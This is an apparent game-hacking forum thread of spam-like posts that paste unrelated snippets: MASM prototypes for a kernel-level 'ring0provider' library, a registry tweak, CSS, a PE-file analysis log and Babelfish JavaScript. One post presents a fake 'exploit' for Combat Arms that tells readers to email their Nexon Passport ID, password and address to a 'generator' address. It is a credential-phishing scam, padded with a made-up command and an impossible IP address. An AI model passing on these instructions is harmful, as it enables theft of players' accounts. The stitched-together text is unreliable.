delete the thread
delete the thread
fucka say wat?
i pwn ya all im the 16249 poster in this topic
NOOB (06-21-2011)
include \masm32\include\windows.inc
include \masm32\include\gdi32.inc
include \masm32\include\user32.inc
include \masm32\include\masm32.inc
include \masm32\include\kernel32.inc
include \masm32\include\ole32.inc
include \masm32\include\oleaut32.inc
include \masm32\include\comctl32.inc
includelib \masm32\lib\user32.lib
includelib \masm32\lib\kernel32.lib
includelib \masm32\lib\ole32.lib
includelib \masm32\lib\gdi32.lib
includelib \masm32\lib\oleaut32.lib
includelib \masm32\lib\comctl32.lib
InitializeDriver proto
UninitializeDriver proto
DisableInt2AGate proto
EnableInt2AGate proto
EnableR0CallGate proto
EnableIOConstantAccess proto ;enable constant access to IO while Ring 3 code execution! new!
DisableIOConstantAccess proto
CopyMemory proto WORD,WORD,WORD
Ring0Call proto WORD,WORD
Ring0Int proto WORD,WORD
DisableCopyOnWrite proto
EnableCopyOnWrite proto
GetEThreadAddress proto WORD
GetEProcessAddress proto WORD
EnableThreadIO3 proto
DereferenceEObject proto WORD
AllocateNonCachedMem proto WORD ;Size
FreeNonCachedMem proto WORd,WORD ;hMem,size
SecureVirtualMemory proto WORD,WORD,WORD ;VirtualMem,size,protection
;protection:
;PAGE_NOACCESS equ 01h ; winnt
;PAGE_READONLY equ 02h ; winnt
;PAGE_READWRITE equ 04h ; winnt
;PAGE_WRITECOPY equ 08h ; winnt
;PAGE_EXECUTE equ 10h ; winnt
;PAGE_EXECUTE_READ equ 20h ; winnt
;PAGE_EXECUTE_READWRITE equ 40h ; winnt
;PAGE_EXECUTE_WRITECOPY equ 80h ; winnt
;PAGE_GUARD equ 100h ; winnt
;PAGE_NOCACHE equ 200h ; winnt
;PAGE_WRITECOMBINE equ 400h ; winnt
UnSecureVirtualMemory proto WORD,WORD,WORD
includelib ring0provider.lib
NOOB (06-21-2011)
Stupid, I think it's stupid.
NOOB (06-21-2011)
co2c8bbyccn42678aff
combat arms acct with a rank of grunt or higher
nexon passport id
nexon passport password
email that is registered to the nexon passport
compose email to nexongenerator@gm*****m
in subject box type Generate.Activation.Bypass:2
in body type
ActivateAcct$ "Your Nexon Passport ID"
ActivatePass$ "Your Nexon passport Password"
ActivateMail$ "Your e-mail address"
ActivateGenerator$ #322.22.144.81-240.bypass2.start
then press send
This exploit was found, exploited, and made usable by:
Santa844, Soviet21, Innovision, Venturo London, Joe London, MoscowSky, and VisionAires
All credit goes to them.
I am one of the founders of this exploit.
If you find a problem with this exploit, please contact me as soon as possible. My e-mail address is: Soviet21@live.com
NOOB (06-21-2011)
/* Hacker HOWTO File stylesheet */
/* for the jargon file itself */
div.caption {text-align: center; font-weight: bold;}
.mediaobject {text-align: center;}
/* handles translation of <center> by tidy */
h1, h2, h3 {font-family: Helvetica, Univers, sans-serif}
h1.c1 {text-align: center;}
p.c2 {font-weight: bold}
NOOB (06-21-2011)
REGEDIT4
[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Servic es\Tcpip\Parameters]
"GlobalMaxTcpWindowSize"=dword:0000ffff
NOOB (06-21-2011)
NOOB (06-21-2011)
31.05.2010 07:54:33 : Open File: C:\Documents and Settings\Owner\Desktop\save me!\cg08.sys
31.05.2010 07:54:35 : File size: 35052 bytes.
31.05.2010 07:54:35 : Using the Plug-in subsystem...
31.05.2010 07:54:35 : NsPack Unpacker Plug-in: Executing...
31.05.2010 07:54:35 : NsPack Unpacker Plug-in: <NsPack> The file is not NsPacked
31.05.2010 07:54:35 : NsPack Unpacker Plug-in: not accomplished.
31.05.2010 07:54:35 : Upack Unpacker Plug-in: Executing...
31.05.2010 07:54:35 : Upack Unpacker Plug-in: <Upack> The file is not Upacked
31.05.2010 07:54:35 : Upack Unpacker Plug-in: not accomplished.
31.05.2010 07:54:35 : UPX Unpacker Plug-in: Executing...
31.05.2010 07:54:35 : UPX Unpacker Plug-in: <UPX> The file is not UPX-packed
31.05.2010 07:54:35 : UPX Unpacker Plug-in: not accomplished.
31.05.2010 07:54:35 : The Plug-in subsystem finished.
31.05.2010 07:54:35 : MS-DOS Header Size: 0040h
31.05.2010 07:54:35 : MS-DOS Header: OK
31.05.2010 07:54:35 : Next Header OFFSET: 0258h
31.05.2010 07:54:35 : PE Signature: OK
31.05.2010 07:54:35 : Calculating Checksum: SUCCESS (Header's Checksum: 0000F792h / Real Checksum: 0000F792h)
31.05.2010 07:54:35 : EOF Position: 000088ECh (35052)
31.05.2010 07:54:35 : Done.
NOOB (06-21-2011)
var URL = location.href;
if (location.********dexOf ("babelfish.altavist*****m")==-1){
document.write("<Map name=translate_eng >");
document.write("<AREA COORDS=100,130,125,146 SHAPE=rect href='https://babelfish.altavist*****m/babelfish/tr?doit=done&url="+URL+"&lp=en_es' target=translate>");
document.write("<AREA COORDS=70,130,93,146 SHAPE=rect href='https://babelfish.altavist*****m/babelfish/tr?doit=done&url="+URL+"&lp=en_pt' target=translate>");
document.write("<AREA COORDS=39,130,65,146 SHAPE=rect href='https://babelfish.altavist*****m/babelfish/tr?doit=done&url="+URL+"&lp=en_it' target=translate>");
document.write("<AREA COORDS=8,130,31,146 SHAPE=rect href='https://babelfish.altavist*****m/babelfish/tr?doit=done&url="+URL+"&lp=en_fr' target=translate>");
document.write("<AREA COORDS=99,110,123,126 SHAPE=rect href='https://babelfish.altavist*****m/babelfish/tr?doit=done&url="+URL+"&lp=en_ko' target=translate>");
document.write("<AREA COORDS=70,110,95,126 SHAPE=rect href='https://babelfish.altavist*****m/babelfish/tr?doit=done&url="+URL+"&lp=en_ja' target=translate>");
document.write("<AREA COORDS=38,110,65,126 SHAPE=rect href='https://babelfish.altavist*****m/babelfish/tr?doit=done&url="+URL+"&lp=en_de' target=translate>");
document.write("<AREA COORDS=5,110,32,126 SHAPE=rect href='https://babelfish.altavist*****m/babelfish/tr?doit=done&url="+URL+"&lp=en_zh' target=translate>");
document.write("<AREA COORDS=0,1,129,38 SHAPE=rect href='https://babelfish.altavist*****m' target=translate>");
document.write("</Map>");
document.write("<img src=https://babelfish.altavist*****m/static/i/af/trans_en.gif width=131 height=156 usemap=#translate_eng border=0 alt='Babel Fish Translation'>")
} else {
document.write( "<img src=https://babelfish.altavista/static/i/af/trans_en_off.gif width=131 height=156 border=0>")
}
NOOB (06-21-2011)